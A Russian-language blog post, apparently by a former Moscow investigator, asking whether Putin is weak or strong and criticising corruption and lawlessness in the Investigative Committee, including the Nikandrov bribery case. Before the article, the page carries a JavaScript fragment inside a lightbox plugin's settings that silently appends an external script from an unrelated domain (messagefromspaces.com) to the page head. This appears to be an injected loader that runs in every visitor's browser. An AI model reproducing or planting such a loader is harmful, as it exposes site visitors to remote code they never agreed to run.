, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Слаб или силён Путин?

09 Мар

До выборов осталось менее десяти дней  и россиянам все СМИ усиленно рассказывают о силе Путина, который, похоже, и сам уверовал в свою победу, невзирая на то, что тема о коррумпированных назначенцах главы государства, не утратила своего значения.

А. Бастрыкин, сообщил http://sledcom.ru/news/item/1200855?utm_referrer=https%3A%2F%2Fzen.yandex.com, что в 2017 году следователями было возбуждено более 17 тысяч уголовных дел о коррупционных преступлениях, в суд направлено свыше 8 тысяч уголовных дел.  Но при этом оставил без ответа вопрос: «Зачем надо было возбуждать свыше 8 тысяч уголовных дел, если они не имели судебной перспективы?»  Это ли не условия для коррупционной деятельности в самом ведомстве? Если бы народу сообщили, что не за год, а хотя бы за месяц, выявили более 17 тысяч коррупционеров, то были бы основания поверить в реальную борьбу с этим криминальным явлением, а «более 17 тысяч» за год выглядят смехотворными.

Вот новый рассказ о том, как бывший замглавы ГСУ СКР по Москве Денис Никандров, которого судят за получение взятки, сам платил своему шефу генералу Дрыманову https://www.novayagazeta.ru/articles/2018/03/07/75723-sam-bral-sam-daval

Обвиняемый Никандров, заключивший  досудебное соглашения  о сотрудничестве со следствием, рассказал, что в качестве благодарности за содействие его  назначению на должность первого заместителя руководителя ГСУ по Москве, а также за общее покровительство на службе, он  не ранее 16 мая  2016 года в здании ГСУ СК России по Москве, расположенном на Новом Арбате, 16/2, передал своему непосредственному начальнику взятку в виде денежных средств на сумму 9850 евро, или более 725 тысяч рублей.

Странно всё это. А почему же служба собственной безопасности этот факт не задокументировала?

Согласитесь, что сумма мелковата для покровительства такого должностного лица.

Если, по версии следствия, Максименко получил 500 тысяч долларов от бизнесмена Олега Шейхаметова только за  обещание переквалифицировать обвинения Кочуйкову и Эдуарду Романову, арестованных после перестрелки у ресторана Elements, то  уж за пост, позволяющий брать сотнями тысяч долларов, взятка,  чуть  более 10 тысяч долларов, выглядит не убедительной.

Мне, как начавшему работу в СУ ГУВД по Москве в начале 80-х, трудно себе представить, чтобы мой начальник И.М. Поташов мог за покровительство над кем-то из своих замов, взять взятку.

Тогда судами не рассматривалось около 70 процентов  уголовных дел в особом порядке, без исследования доказательств. Даже при заключении под стражу, требовалось иметь доказательства, позволяющие предъявить заподозренному лицу обвинение, а также обосновывающие невозможность применения иной меры пресечения. Прокуратура строго следила за этим.

У следователей в районах было в производстве по 50−60 уголовных дел в год. Нередко, среди них были и объёмные дела, по которым проходило несколько обвиняемых.

Например, в 1982 году я завершил расследование уголовного дела по хищениям в Легкоатлетическом спортивном комплекс «Спартак»,  что в Сокольниках,  где было допрошено в качестве свидетелей более 500 человек, предъявлено обвинение девяти фигурантам, которым суд впоследствии определил наказания в 5−10 лет лишения свободы. При этом в моём производстве находилось ещё десять уголовных дел.

При такой нагрузке на следователей, никогда количество допущенных нарушений закона на следствии не  измерялось миллионами, как¸ например, сейчас составило 5,2 миллиона http://kremlin.ru/events/president/news/56863

Причину деградации следствия вижу, прежде всего, в  таком явлении, как «кумовство», которое процветало на следствии в 90-е годы, а также надлежащее исполнение своих обязанностей теми, кто взялся на всех уровнях осуществлять руководство предварительным расследованием в России,  не понимая сути и духа этой деятельности.

За десять лет в этом ведомстве доказано — личная преданность оказалась неспособной обеспечить работу по правилам, установленным Конституцией России и процессуальным законодательством.

При всём своём усердии Александр Бастрыкин не сумел создать ведомство, которое пользовалось бы уважением у народа и юристов. Исполнилось 10 лет с тех пор, как стартовала реформа следственных органов, но такое впечатление, что она со старта пошла не туда.  А при таких обстоятельствах, как можно осуществлять защиту прав и  свобод россиян,  соблюдать их права?

В стране, где процветает пыточное судопроизводство, где назначают обвиняемым того, кто никаких преступлений не совершал, иначе, как позором, нельзя считать направление в суды около 70% уголовных дел, законченных в  особом порядке, без исследования доказательств, где виновность доказана только признательными показаниями обвиняемых.

Сегодня ведомственный контроль, который, как предполагалось, обеспечит законность работы следствия, неспособен  исправить сложившуюся в системе ситуацию.  Надзирающая за исполнением законов прокуратура, только констатирует, что более 5 миллионов нарушений  закона происходит в год,  доказывая несостоятельность ведомственного контроля.

Кроме того, именно выстроенное годами  «покровительство» начальства в этом ведомстве и позволило за два года безнаказанно обобрать около 500 000 предпринимателей, неправомерно  возбудив  уголовные дела.

Ясно, что с искалеченными таким судопроизводством  душами, следователи напрочь утратили предъявляемое к ним законом требование — защищать не только потерпевших от преступлений, но и личность от незаконного и необоснованного обвинения, осуждения, ограничения ее прав и свобод.

У Путина нет сегодня кадров, способных обеспечить работу следствия по требованиям закона. Как быть?

Результаты криминального обогащения чиновников у всех на виду, поэтому надо Путину проявить волю и потребовать от своей  Администрации  начать в самых широких масштабах  применять п.п. 8 п. 2 ст. 235 ГК РФ к чиновникам, что живут явно не на  государственные зарплаты. Но, как это начать, если особые назначенцы Путина, получают за свой «труд», как бы законные  миллионы в день?

Мне представляется, что решениями именно по таким событиям в стране и определяется — Путин сильный или слабый Президент России?

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.